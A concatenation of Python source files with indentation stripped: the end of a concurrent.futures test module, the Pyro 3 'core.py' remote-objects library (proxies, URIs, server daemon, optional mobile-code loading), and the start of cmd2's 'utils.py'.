self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
t.join()
def test_multiple_set_result(self):
f = create_future(state=PENDING)
f.set_result(1)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished returned int>'
):
f.set_result(2)
self.assertTrue(f.done())
self.assertEqual(f.result(), 1)
def test_multiple_set_exception(self):
f = create_future(state=PENDING)
e = ValueError()
f.set_exception(e)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished raised ValueError>'
):
f.set_exception(Exception())
self.assertEqual(f.exception(), e)
_threads_key = None
def setUpModule():
global _threads_key
_threads_key = test.support.threading_setup()
def tearDownModule():
test.support.threading_cleanup(*_threads_key)
multiprocessing.util._cleanup_tests()
if __name__ == "__main__":
unittest.main()
|
core.py
|
#############################################################################
#
# Pyro Core Library
#
# This is part of "Pyro" - Python Remote Objects
# which is (c) Irmen de Jong - irmen@razorvine.net
#
#############################################################################
from __future__ import with_statement
import sys, time, re, os, weakref
import imp, marshal, new, socket
from pickle import PicklingError
import Pyro.constants, Pyro.util, Pyro.protocol, Pyro.errors
from Pyro.errors import *
from types import UnboundMethodType, MethodType, BuiltinMethodType, TupleType, StringType, UnicodeType
if Pyro.util.supports_multithreading():
import threading
Log=Pyro.util.Log
def _checkInit(pyrotype="client"):
if not getattr(Pyro.config, Pyro.constants.CFGITEM_PYRO_INITIALIZED):
# If Pyro has not been initialized explicitly, do it automatically.
if pyrotype=="server":
initServer()
else:
initClient()
#############################################################################
#
# ObjBase - Server-side object implementation base class
# or master class with the actual object as delegate
#
# SynchronizedObjBase - Just the same, but with synchronized method
# calls (thread-safe).
#
#############################################################################
class ObjBase(object):
def __init__(self):
self.objectGUID=Pyro.util.getGUID()
self.delegate=None
self.lastUsed=time.time() # for later reaping unused objects
if Pyro.config.PYRO_MOBILE_CODE:
self.codeValidator=lambda n,m,a: 1 # always accept
def GUID(self):
return self.objectGUID
def setGUID(self, guid): # used with persistent name server
self.objectGUID = guid
def delegateTo(self,delegate):
self.delegate=delegate
def setPyroDaemon(self, daemon):
# This will usually introduce a cyclic reference between the
# object and the daemon. Use a weak ref if available.
# NOTE: if you correctly clean up the object (that is, disconnect it from the daemon)
# the cyclic reference is cleared correctly, and no problem occurs.
# NOTE: you have to make sure your original daemon object doesn't get garbage collected
# if you still want to use the objects! You have to keep a ref. to the daemon somewhere.
if daemon:
self.daemon=weakref.proxy(daemon)
else:
self.daemon=None
def setCodeValidator(self, v):
if not callable(v):
raise TypeError("codevalidator must be a callable object")
self.codeValidator=v
def getDaemon(self):
return self.daemon
def getLocalStorage(self):
return self.daemon.getLocalStorage()
def _gotReaped(self):
# Called when daemon reaps this object due to unaccessed time
# Override this method if needed; to act on this event
pass
def getProxy(self):
return self.daemon.getProxyForObj(self)
def getAttrProxy(self):
return self.daemon.getAttrProxyForObj(self)
def Pyro_dyncall(self, method, flags, args):
# update the timestamp
self.lastUsed=time.time()
# find the method in this object, and call it with the supplied args.
keywords={}
if flags & Pyro.constants.RIF_Keywords:
# reconstruct the varargs from a tuple like
# (a,b,(va1,va2,va3...),{kw1:?,...})
keywords=args[-1]
args=args[:-1]
if flags & Pyro.constants.RIF_Varargs:
# reconstruct the varargs from a tuple like (a,b,(va1,va2,va3...))
args=args[:-1]+args[-1]
if keywords and type(keywords.iterkeys().next()) is unicode and sys.platform!="cli":
# IronPython sends all strings as unicode, but apply() doesn't grok unicode keywords.
# So we need to rebuild the keywords dict with str keys...
keywords = dict([(str(k),v) for k,v in keywords.iteritems()])
# If the method is part of ObjBase, never call the delegate object because
# that object doesn't implement that method. If you don't check this,
# remote attributes won't work with delegates for instance, because the
# delegate object doesn't implement _r_xa. (remote_xxxattr)
if method in dir(ObjBase):
return getattr(self,method) (*args,**keywords)
else:
# try..except to deal with obsoleted string exceptions (raise "blahblah")
try :
return getattr(self.delegate or self,method) (*args,**keywords)
except :
exc_info = sys.exc_info()
try:
if type(exc_info[0]) == StringType :
if exc_info[1] == None :
raise Exception, exc_info[0], exc_info[2]
else :
raise Exception, "%s: %s" % (exc_info[0], exc_info[1]), exc_info[2]
else :
raise
finally:
del exc_info # delete frame to allow proper GC
# remote getattr/setattr support:
def _r_ha(self, attr):
try:
attr = getattr(self.delegate or self,attr)
if type(attr) in (UnboundMethodType, MethodType, BuiltinMethodType):
return 1 # method
except:
pass
return 2 # attribute
def _r_ga(self, attr):
return getattr(self.delegate or self, attr)
def _r_sa(self, attr, value):
setattr(self.delegate or self, attr, value)
# remote code downloading support (server downloads from client):
def remote_supply_code(self, name, module, sourceaddr):
# XXX this is nasty code, and also duplicated in protocol.py _retrieveCode()
if Pyro.config.PYRO_MOBILE_CODE and self.codeValidator(name,module,sourceaddr):
try:
imp.acquire_lock() # threadsafe imports
if name in sys.modules and getattr(sys.modules[name],'_PYRO_bytecode',None):
# already have this module, don't import again
# we checked for the _PYRO_bytecode attribute because that is only
# present when all loading code below completed successfully
return
Log.msg('ObjBase','loading supplied code: ',name,'from',str(sourceaddr))
if module[0:4]!=imp.get_magic():
# compile source code
code=compile(module,'<downloaded>','exec')
else:
# read bytecode from the client
code=marshal.loads(module[8:])
# make the module hierarchy and add all names to sys.modules
name=name.split('.')
path=''
mod=new.module("pyro-agent-context")
for m in name:
path+='.'+m
# use already loaded modules instead of overwriting them
real_path = path[1:]
if sys.modules.has_key(real_path):
mod = sys.modules[real_path]
else:
setattr(mod,m,new.module(path[1:]))
mod=getattr(mod,m)
sys.modules[path[1:]]=mod
# execute the module code in the right module.
exec code in mod.__dict__
# store the bytecode for possible later reference if we need to pass it on
mod.__dict__['_PYRO_bytecode'] = module
finally:
imp.release_lock()
else:
Log.warn('ObjBase','attempt to supply code denied: ',name,'from',str(sourceaddr))
raise PyroError('attempt to supply code denied')
# remote code retrieve support (client retrieves from server):
def remote_retrieve_code(self, name):
# XXX codeValidator: can we somehow get the client's address it is sent to?
# XXX this code is ugly. And duplicated in protocol.py remoteInvocation.
if Pyro.config.PYRO_MOBILE_CODE and self.codeValidator(name,None,None):
Log.msg("ObjBase","supplying code: ",name)
try:
importmodule=new.module("pyro-server-import")
try:
exec "import " + name in importmodule.__dict__
except ImportError:
Log.error("ObjBase","Client wanted a non-existing module:", name)
raise PyroError("Client wanted a non-existing module", name)
m=eval("importmodule."+name)
# try to load the module's compiled source, or the real .py source if that fails.
# note that the source code (.py) is opened with universal newline mode
(filebase,ext)=os.path.splitext(m.__file__)
if ext.startswith(".PY"):
exts = ( (".PYO","rb"), (".PYC","rb"), (".PY","rU") ) # uppercase
else:
exts = ( (".pyo","rb"), (".pyc","rb"), (".py","rU") ) # lowercase
for ext,mode in exts:
try:
m=open(filebase+ext, mode).read()
return m # supply the module to the client!
except:
pass
Log.error("ObjBase","cannot read module source code for module:", name)
raise PyroError("cannot read module source code")
finally:
del importmodule
else:
Log.error("ObjBase","attempt to retrieve code denied:", name)
raise PyroError("attempt to retrieve code denied")
class SynchronizedObjBase(ObjBase):
def __init__(self):
ObjBase.__init__(self)
self.synlock=Pyro.util.getLockObject()
def Pyro_dyncall(self, method, flags, args):
with self.synlock:
return ObjBase.Pyro_dyncall(self, method,flags,args)
# Use this class instead if you're using callback objects and you
# want to see local exceptions. (otherwise they go back to the calling server...)
class CallbackObjBase(ObjBase):
def __init__(self):
ObjBase.__init__(self)
def Pyro_dyncall(self, method, flags, args):
try:
return ObjBase.Pyro_dyncall(self,method,flags,args)
except Exception,x:
# catch all errors
Log.warn('CallbackObjBase','Exception in callback object: ',x)
raise PyroExceptionCapsule(x,str(x))
#############################################################################
#
# PyroURI - Pyro Universal Resource Identifier
#
# This class represents a Pyro URI (which consists of four parts,
# a protocol identifier, an IP address, a portnumber, and an object ID.
#
# The URI can be converted to a string representation (str converter).
# The URI can also be read back from such a string (reinitFromString).
# The URI can be initialised from its parts (init).
# The URI can be initialised from a string directly, if the init
# code detects a ':' and '/' in the host argument (which is then
# assumed to be a string URI, not a host name/ IP address).
#
#############################################################################
class PyroURI(object):
def __init__(self,host,objectID=0,port=0,prtcol='PYRO'):
# if the 'host' arg is a PyroURI, copy contents
if isinstance(host, PyroURI):
self.init(host.address, host.objectID, host.port, host.protocol)
else:
# If the 'host' arg contains '://', assume it's an URI string.
if host.find('://')>0:
self.reinitFromString(host)
else:
if not objectID:
raise URIError('invalid URI format')
self.init(host, objectID, port, prtcol)
def __str__(self):
return self.protocol+'://'+self.address+':'+str(self.port)+'/'+self.objectID
def __repr__(self):
return '<PyroURI \''+str(self)+'\'>'
def __hash__(self):
# XXX this is handy but not safe. If the URI changes, the object will be in the wrong hash bucket.
return hash(str(self))
def __cmp__(self, o):
return cmp(str(self), str(o))
def clone(self):
return PyroURI(self)
def init(self,host,objectID,port=0,prtcol='PYRO'):
if '/' in host:
raise URIError('malformed hostname')
if Pyro.config.PYRO_DNS_URI:
self.address = host
else:
self.address=Pyro.protocol.getIPAddress(host)
if not self.address:
raise URIError('unknown host')
if port:
if type(port)==type(1):
self.port=port
else:
raise TypeError("port must be integer")
else:
self.port=Pyro.config.PYRO_PORT
self.protocol=prtcol
self.objectID=objectID
def reinitFromString(self,arg):
if arg.startswith('PYROLOC') or arg.startswith('PYRONAME'):
uri=processStringURI(arg)
self.init(uri.address,uri.objectID,uri.port,uri.protocol)
return
x=re.match(r'(?P<protocol>[^\s:/]+)://(?P<hostname>[^\s:]+):?(?P<port>\d+)?/(?P<id>\S*)',arg)
if x:
port=None
if x.group('port'):
port=int(x.group('port'))
self.init(x.group('hostname'), x.group('id'), port, x.group('protocol'))
return
Log.error('PyroURI','invalid URI format passed: '+arg)
raise URIError('invalid URI format')
def getProxy(self):
return DynamicProxy(self)
def getAttrProxy(self):
return DynamicProxyWithAttrs(self)
#
# This method takes a string representation of a Pyro URI
# and parses it. If it's a meta-protocol URI such as
# PYRONAME://.... it will do what is needed to make
# a regular PYRO:// URI out of it (resolve names etc).
#
def processStringURI(URI):
# PYRONAME(SSL)://[hostname[:port]/]objectname
x=re.match(r'(?P<protocol>PYRONAME|PYRONAMESSL)://(((?P<hostname>[^\s:]+):(?P<port>\d+)/)|((?P<onlyhostname>[^\s:]+)/))?(?P<name>\S*)',URI)
if x:
protocol=x.group('protocol')
if protocol=="PYRONAMESSL":
raise ProtocolError("NOT SUPPORTED YET: "+protocol) # XXX obviously, this should be implemented
hostname=x.group('hostname') or x.group('onlyhostname')
port=x.group('port')
name=x.group('name')
import Pyro.naming
loc=Pyro.naming.NameServerLocator()
if port:
port=int(port)
NS=loc.getNS(host=hostname,port=port)
return NS.resolve(name)
# PYROLOC(SSL)://hostname[:port]/objectname
x=re.match(r'(?P<protocol>PYROLOC|PYROLOCSSL)://(?P<hostname>[^\s:]+):?(?P<port>\d+)?/(?P<name>\S*)',URI)
if x:
protocol=x.group('protocol')
hostname=x.group('hostname')
port=x.group('port')
if port:
port=int(port)
else:
port=0
name=x.group('name')
return PyroURI(hostname,name,port,protocol)
if URI.startswith('PYROLOC') or URI.startswith('PYRONAME'):
# hmm should have matched above. Likely invalid.
raise URIError('invalid URI format')
# It's not a meta-protocol such as PYROLOC or PYRONAME,
# let the normal Pyro URI deal with it.
# (it can deal with regular PYRO: and PYROSSL: protocols)
return PyroURI(URI)
#############################################################################
#
# DynamicProxy - dynamic Pyro proxy
#
# Can be used by clients to invoke objects for which they have no
# precompiled proxy.
#
#############################################################################
def getProxyForURI(URI):
return DynamicProxy(URI)
def getAttrProxyForURI(URI):
return DynamicProxyWithAttrs(URI)
class _RemoteMethod(object):
# method call abstraction, adapted from Python's xmlrpclib
# it would be rather easy to add nested method calls, but
# that is not compatible with the way that Pyro's method
# calls are defined to work ( no nested calls )
def __init__(self, send, name):
self.__send = send
self.__name = name
def __call__(self, *args, **kwargs):
return self.__send(self.__name, args, kwargs)
class DynamicProxy(object):
def __init__(self, URI):
_checkInit() # init required
if type(URI) in (StringType,UnicodeType):
URI=processStringURI(URI)
self.URI = URI
self.objectID = URI.objectID
# Delay adapter binding to enable transporting of proxies.
# We just create an adapter, and don't connect it...
self.adapter = Pyro.protocol.getProtocolAdapter(self.URI.protocol)
# ---- don't forget to register local vars with DynamicProxyWithAttrs, see below
def __del__(self):
try:
self.adapter.release(nolog=1)
except (AttributeError, RuntimeError):
pass
def _setIdentification(self, ident):
self.adapter.setIdentification(ident)
def _setNewConnectionValidator(self, validator):
self.adapter.setNewConnectionValidator(validator)
def _setOneway(self, methods):
if type(methods) not in (type([]), type((0,))):
methods=(methods,)
self.adapter.setOneway(methods)
def _setTimeout(self,timeout):
self.adapter.setTimeout(timeout)
def _transferThread(self, newOwnerThread=None):
pass # dummy function to retain API compatibility with Pyro 3.7
def _release(self):
if self.adapter:
self.adapter.release()
def _local(self):
return self.URI._local()
def _islocal(self):
return self.URI._islocal()
def __copy__(self): # create copy of current proxy object
proxyCopy = DynamicProxy(self.URI)
proxyCopy.adapter.setIdentification(self.adapter.getIdentification(), munge=False) # copy identification info
proxyCopy._setTimeout(self.adapter.timeout)
proxyCopy._setOneway(self.adapter.onewayMethods)
proxyCopy._setNewConnectionValidator(self.adapter.getNewConnectionValidator())
return proxyCopy
def __deepcopy__(self, arg):
raise PyroError("cannot deepcopy a proxy")
def __getattr__(self, name):
if name in ("__getnewargs__","__getinitargs__"): # allows it to be safely pickled
raise AttributeError()
return _RemoteMethod(self._invokePYRO, name)
def __repr__(self):
return "<"+self.__class__.__name__+" for "+str(self.URI)+">"
def __str__(self):
return repr(self)
def __hash__(self):
# makes it possible to use this class as a key in a dict
return hash(self.objectID)
def __eq__(self,other):
# makes it possible to compare two proxies using objectID
return hasattr(other,"objectID") and self.objectID==other.objectID
def __ne__(self,other):
# makes it possible to compare two proxies using objectID
return not hasattr(other,"objectID") or self.objectID!=other.objectID
def __nonzero__(self):
return 1
def __coerce__(self,other):
# makes it possible to compare two proxies using objectID (cmp)
if hasattr(other,"objectID"):
return (self.objectID, other.objectID)
return None
def _invokePYRO(self, name, vargs, kargs):
if not self.adapter.connected():
# rebind here, don't do it from inside the remoteInvocation because deadlock will occur
self.adapter.bindToURI(self.URI)
return self.adapter.remoteInvocation(name, Pyro.constants.RIF_VarargsAndKeywords, vargs, kargs)
# Pickling support, otherwise pickle uses __getattr__:
def __getstate__(self):
# for pickling, return a non-connected copy of ourselves:
cpy = self.__copy__()
cpy._release()
return cpy.__dict__
def __setstate__(self, args):
# for pickling, to restore the pickled state
self.__dict__.update(args)
class DynamicProxyWithAttrs(DynamicProxy):
_local_attrs = ("_local_attrs","URI", "objectID", "adapter", "_attr_cache")
def __init__(self, URI):
self._attr_cache = {}
DynamicProxy.__init__(self, URI)
def _r_ga(self, attr, value=0):
if value:
return _RemoteMethod(self._invokePYRO, "_r_ga") (attr) # getattr
else:
return _RemoteMethod(self._invokePYRO, "_r_ha") (attr) # hasattr
def findattr(self, attr):
if attr in self._attr_cache.keys():
return self._attr_cache[attr]
# look it up and cache the value
self._attr_cache[attr] = self._r_ga(attr)
return self._attr_cache[attr]
def __copy__(self): # create copy of current proxy object
return DynamicProxyWithAttrs(self.URI)
def __setattr__(self, attr, value):
if attr in self._local_attrs:
self.__dict__[attr]=value
else:
result = self.findattr(attr)
if result==2: # attribute
return _RemoteMethod(self._invokePYRO, "_r_sa") (attr,value)
else:
raise AttributeError('not an attribute')
def __getattr__(self, attr):
# allows it to be safely pickled
if attr not in ("__getnewargs__","__getinitargs__", "__hash__","__eq__","__ne__") and attr not in self._local_attrs:
result=self.findattr(attr)
if result==1: # method
return _RemoteMethod(self._invokePYRO, attr)
elif result:
return self._r_ga(attr, 1)
raise AttributeError
#############################################################################
#
# Daemon - server-side Pyro daemon
#
# Accepts and dispatches incoming Pyro method calls.
#
#############################################################################
# The pyro object that represents the daemon.
# The daemon is not directly remotely accessible, for security reasons.
class DaemonServant(ObjBase):
def __init__(self, daemon):
ObjBase.__init__(self)
self.daemon=weakref.proxy(daemon)
def getRegistered(self):
return self.daemon.getRegistered()
def ResolvePYROLOC(self, name):
return self.daemon.ResolvePYROLOC(name)
# The daemon itself:
class Daemon(Pyro.protocol.TCPServer, ObjBase):
def __init__(self,prtcol='PYRO',host=None,port=0,norange=0,publishhost=None):
ObjBase.__init__(self)
self.NameServer = None
self.connections=[]
_checkInit("server") # init required
self.setGUID(Pyro.constants.INTERNAL_DAEMON_GUID)
self.implementations={Pyro.constants.INTERNAL_DAEMON_GUID:(DaemonServant(self),'__PYRO_Internal_Daemon')}
self.persistentConnectedObjs=[] # guids
self.transientsCleanupAge=0
self.transientsMutex=Pyro.util.getLockObject()
self.nscallMutex=Pyro.util.getLockObject()
if host is None:
host=Pyro.config.PYRO_HOST
if publishhost is None:
publishhost=Pyro.config.PYRO_PUBLISHHOST
# Determine range scanning or random port allocation
if norange:
# Fixed or random port allocation
# If port is zero, OS will randomly assign, otherwise,
# attempt to use the provided port value
self.port = port
portrange = 1
else:
# Scanning port allocation
if port:
self.port = port
else:
self.port = Pyro.config.PYRO_PORT
portrange=Pyro.config.PYRO_PORT_RANGE
if not publishhost:
publishhost=host
errormsg=''
for i in range(portrange):
try:
Pyro.protocol.TCPServer.__init__(self, self.port, host, Pyro.config.PYRO_MULTITHREADED,prtcol)
if not self.port:
# If we bound to an OS provided port, report it
self.port = self.sock.getsockname()[1]
self.hostname = publishhost or Pyro.protocol.getHostname()
self.protocol = prtcol
self.adapter = Pyro.protocol.getProtocolAdapter(prtcol)
self.validateHostnameAndIP() # ignore any result message... it's in the log already.
return
except ProtocolError,msg:
errormsg=msg
self.port+=1
Log.error('Daemon','Couldn\'t start Pyro daemon: ' +str(errormsg))
raise DaemonError('Couldn\'t start Pyro daemon: ' +str(errormsg))
# to be called to stop all connections and shut down.
def shutdown(self, disconnect=False):
Pyro.protocol.TCPServer.shutdown(self)
if disconnect:
self.__disconnectObjects()
def __disconnectObjects(self):
# server shutting down, unregister all known objects in the NS
if self.NameServer and Pyro and Pyro.constants:
with self.nscallMutex:
if Pyro.constants.INTERNAL_DAEMON_GUID in self.implementations:
del self.implementations[Pyro.constants.INTERNAL_DAEMON_GUID]
if self.implementations:
Log.warn('Daemon','Shutting down but there are still',len(self.implementations),'objects connected - disconnecting them')
for guid in self.implementations.keys():
if guid not in self.persistentConnectedObjs:
(obj,name)=self.implementations[guid]
if name:
try:
self.NameServer.unregister(name)
except Exception,x:
Log.warn('Daemon','Error while unregistering object during shutdown:',x)
self.implementations={}
def __del__(self):
self.__disconnectObjects() # unregister objects
try:
del self.adapter
Pyro.protocol.TCPServer.__del__(self)
except (AttributeError, RuntimeError):
pass
def __str__(self):
return '<Pyro Daemon on '+self.hostname+':'+str(self.port)+'>'
def __getstate__(self):
raise PicklingError('no access to the daemon')
def validateHostnameAndIP(self):
# Checks if hostname is sensible. Returns None if it is, otherwise a message
# telling what's wrong if it isn't too serious. If things are really bad,
# expect an exception to be raised. Things are logged too.
if not self.hostname:
Log.error("Daemon","no hostname known")
raise socket.error("no hostname known for daemon")
if self.hostname!="localhost":
ip = Pyro.protocol.getIPAddress(self.hostname)
if ip is None:
Log.error("Daemon","no IP address known")
raise socket.error("no IP address known for daemon")
if not ip.startswith("127.0."):
return None # this is good!
# 127.0.x.x or 'localhost' is a warning situation!
msg="daemon bound on hostname that resolves to loopback address 127.0.x.x"
Log.warn("Daemon",msg)
Log.warn("Daemon","hostname="+self.hostname)
return msg
def useNameServer(self,NS):
self.NameServer=NS
def getNameServer(self):
return self.NameServer
def setTimeout(self, timeout):
self.adapter.setTimeout(timeout)
def setAllowedIdentifications(self, ids):
self.getNewConnectionValidator().setAllowedIdentifications(ids)
def setTransientsCleanupAge(self, secs):
self.transientsCleanupAge=secs
if self.threaded:
Log.msg('Daemon','creating Grim Reaper thread for transients, timeout=',secs)
reaper=threading.Thread(target=self._grimReaper)
reaper.setDaemon(1) # thread must exit at program termination.
reaper.start()
def _grimReaper(self):
# this runs in a thread.
while self.transientsCleanupAge>0:
time.sleep(self.transientsCleanupAge/5)
self.reapUnusedTransients()
def getProxyForObj(self, obj):
return DynamicProxy( PyroURI(self.hostname,
obj.GUID(), prtcol=self.protocol, port=self.port) )
def getAttrProxyForObj(self, obj):
return DynamicProxyWithAttrs( PyroURI(self.hostname,
obj.GUID(), prtcol=self.protocol, port=self.port) )
def connectPersistent(self, obj, name=None):
# when a persistent entry is found in the NS, that URI is
# used instead of the supplied one, if the address matches.
if name and self.NameServer:
with self.nscallMutex:
try:
newURI = PyroURI(self.hostname, obj.GUID(), prtcol=self.protocol, port=self.port)
URI=self.NameServer.resolve(name)
if (URI.protocol,URI.address,URI.port)==(newURI.protocol,newURI.address,newURI.port):
# reuse the previous object ID
obj.setGUID(URI.objectID)
# enter the (object,name) in the known impl. dictionary
self.implementations[obj.GUID()]=(obj,name)
self.persistentConnectedObjs.append(obj.GUID())
obj.setPyroDaemon(self)
return URI
else:
# name exists, but address etc. is wrong. Remove it.
# then continue so it wil be re-registered.
try: self.NameServer.unregister(name)
except NamingError: pass
except NamingError:
pass
# Register normally.
self.persistentConnectedObjs.append(obj.GUID())
return self.connect(obj, name)
def connect(self, obj, name=None):
URI = PyroURI(self.hostname, obj.GUID(), prtcol=self.protocol, port=self.port)
# if not transient, register the object with the NS
if name:
with self.nscallMutex:
if self.NameServer:
self.NameServer.register(name, URI)
else:
Log.warn('Daemon','connecting object without name server specified:',name)
# enter the (object,name) in the known implementations dictionary
self.implementations[obj.GUID()]=(obj,name)
obj.setPyroDaemon(self)
return URI
def disconnect(self,obj): # obj can be either the object that was registered, or its uid
try:
if isinstance(obj,Pyro.core.ObjBase):
obj_uid=obj.GUID()
else:
obj_uid=str(obj)
if obj_uid==Pyro.constants.INTERNAL_DAEMON_GUID:
return # never allow to remove ourselves from the registry
if self.NameServer and self.implementations[obj_uid][1]:
with self.nscallMutex:
# only unregister with NS if it had a name (was not transient)
self.NameServer.unregister(self.implementations[obj_uid][1])
del self.implementations[obj_uid]
if obj_uid in self.persistentConnectedObjs:
self.persistentConnectedObjs.remove(obj_uid)
# XXX Clean up connections/threads to this object?
# Can't be done because thread/socket is not associated with single object
finally:
if isinstance(obj,Pyro.core.ObjBase):
obj.setPyroDaemon(None)
def getRegistered(self):
r={}
for guid in self.implementations.keys():
r[guid]=self.implementations[guid][1] # keep only the names
return r
def handleInvocation(self, conn): # overridden from TCPServer
# called in both single- and multithreaded mode
self.getLocalStorage().caller=conn
self.getAdapter().handleInvocation(self, conn)
self.reapUnusedTransients()
def reapUnusedTransients(self):
if not self.transientsCleanupAge: return
now=time.time()
with self.transientsMutex:
for (obj,name) in self.implementations.values()[:]: # use copy of list
if not name:
# object is transient, reap it if timeout requires so.
if (now-obj.lastUsed)>self.transientsCleanupAge:
self.disconnect(obj)
obj._gotReaped()
def handleError(self,conn,onewaycall=False): # overridden from TCPServer
try:
(exc_type, exc_value, exc_trb) = sys.exc_info()
if exc_type==ProtocolError:
# Problem with the communication protocol, shut down the connection
# XXX is shutting down what we want???
Log.error('Daemon','protocol error occured:',exc_value)
Log.error('Daemon','Due to network error: shutting down connection with',conn)
self.removeConnection(conn)
else:
exclist = Pyro.util.formatTraceback(exc_type, exc_value, exc_trb)
out =''.join(exclist)
Log.warn('Daemon', 'Exception during processing of request from',
conn,' type',exc_type,
'\n--- traceback of this exception follows:\n',
out,'\n--- end of traceback')
if exc_type==PyroExceptionCapsule:
sys.stdout.flush()
# This is a capsuled exception, used with callback objects.
# That means we are actually the daemon on the client.
# Return the error to the other side and raise exception locally once more.
# (with a normal exception, it is not raised locally again!)
# only send the exception object if it's not a oneway call.
if not onewaycall:
self.adapter.returnException(conn,exc_value.excObj,0,exclist) # don't shutdown
exc_value.raiseEx()
else:
# normal exception, only return exception object if it's not a oneway call
if not onewaycall:
self.adapter.returnException(conn,exc_value,0,exclist) # don't shutdown connection
finally:
# clean up circular references to traceback info to allow proper GC
del exc_type, exc_value, exc_trb
def getAdapter(self):
# overridden from TCPServer
return self.adapter
def getLocalObject(self, guid):
# return a local object registered with the given guid
return self.implementations[guid][0]
def getLocalObjectForProxy(self, proxy):
# return a local object registered with the guid to which the given proxy points
return self.implementations[proxy.objectID][0]
def ResolvePYROLOC(self, name):
# this gets called from the protocol adapter when
# it wants the daemon to resolve a local object name (PYROLOC: protocol)
Log.msg('Daemon','resolving PYROLOC name: ',name)
for o in self.implementations.keys():
if self.implementations[o][1]==name:
return o
raise NamingError('no object found by this name',name)
#############################################################################
#
# Client/Server Init code
#
#############################################################################
# Has init been performed already?
_init_server_done=0
_init_client_done=0
_init_generic_done=0
def _initGeneric_pre():
global _init_generic_done
if _init_generic_done:
return
if Pyro.config.PYRO_TRACELEVEL == 0: return
try:
out='\n'+'-'*60+' NEW SESSION\n'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))+ \
' Pyro Initializing, version '+Pyro.constants.VERSION+'\n'
Log.raw(out)
except IOError,e:
sys.stderr.write('PYRO: Can\'t write the tracefile '+Pyro.config.PYRO_LOGFILE+'\n'+str(e))
def _initGeneric_post():
global _init_generic_done
setattr(Pyro.config, Pyro.constants.CFGITEM_PYRO_INITIALIZED,1)
if Pyro.config.PYRO_TRACELEVEL == 0: return
try:
if not _init_generic_done:
out='Configuration settings are as follows:\n'
for item in dir(Pyro.config):
if item[0:4] =='PYRO':
out+=item+' = '+str(Pyro.config.__dict__[item])+'\n'
Log.raw(out)
Log.raw('Init done.\n'+'-'*70+'\n')
except IOError:
pass
_init_generic_done=1
def initClient(banner=0):
global _init_client_done
if _init_client_done: return
_initGeneric_pre()
if Pyro.config.PYRO_TRACELEVEL >0: Log.raw('This is initClient.\n')
Pyro.config.finalizeConfig_Client()
_initGeneric_post()
if banner:
print 'Pyro Client Initialized. Using Pyro V'+Pyro.constants.VERSION
_init_client_done=1
def initServer(banner=0, storageCheck=1):
global _init_server_done
if _init_server_done: return
_initGeneric_pre()
if Pyro.config.PYRO_TRACELEVEL >0: Log.raw('This is initServer.\n')
Pyro.config.finalizeConfig_Server(storageCheck=storageCheck)
_initGeneric_post()
if banner:
print 'Pyro Server Initialized. Using Pyro V'+Pyro.constants.VERSION
_init_server_done=1
if __name__=="__main__":
print "Pyro version:",Pyro.constants.VERSION
|
utils.py
|
# coding=utf-8
"""Shared utility functions"""
import argparse
import collections
import functools
import glob
import inspect
import itertools
import os
import re
import subprocess
import sys
import threading
import unicodedata
from enum import (
Enum,
)
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
Iterable,
List,
Optional,
TextIO,
Type,
TypeVar,
Union,
cast,
)
from . import (
constants,
)
from .argparse_custom import (
ChoicesProviderFunc,
CompleterFunc,
)
if TYPE_CHECKING: # pragma: no cover
import cmd2 # noqa: F401
PopenTextIO = subprocess.Popen[bytes]
else:
PopenTextIO = subprocess.Popen
_T = TypeVar('_T')
def is_quoted(arg: str) -> bool:
"""
Checks if a string is quoted
:param arg: the string being checked for quotes
:return: True if a string is quoted
"""
return len(arg) > 1 and arg[0] == arg[-1] and arg[0] in constants.QUOTES
def quote_string(arg: str) -> str:
"""Quote a string"""
if '"' in arg:
quote = "'"
else:
quote = '"'
return quote + arg + quote
def quote_string_if_needed(arg: str) -> str:
"""Quote a string if it contains spaces and isn't already quoted"""
if is_quoted(arg) or ' ' not in arg:
return arg
return quote_string(arg)
def strip_quotes(arg: str) -> str:
"""Strip outer quotes from a string.
Applies to both single and double quotes.
:param arg: string to strip outer quotes from
:return: same string with potentially outer quotes stripped
"""
if is_quoted(arg):
arg = arg[1:-1]
return arg
def str_to_bool(val: str) -> bool:
"""Converts a string to a boolean based on its value.
:param val: string being converted
:return: boolean value expressed in the string
:raises: ValueError if the string does not contain a value corresponding to a boolean value
"""
if isinstance(val, str):
if val.capitalize() == str(True):
return True
elif val.capitalize() == str(False):
return False
raise ValueError("must be True or False (case-insensitive)")
class Settable:
"""Used to configure an attribute to be settable via the set command in the CLI"""
def __init__(
self,
name: str,
val_type: Union[Type[Any], Callable[[Any], Any]],
description: str,
settable_object: object,
*,
settable_attrib_name: Optional[str] = None,
onchange_cb: Optional[Callable[[str, _T, _T], Any]] = None,
choices: Optional[Iterable[Any]] = None,
choices_provider: Optional[ChoicesProviderFunc] = None,
completer: Optional[CompleterFunc] = None,
) -> None:
"""
Settable Initializer
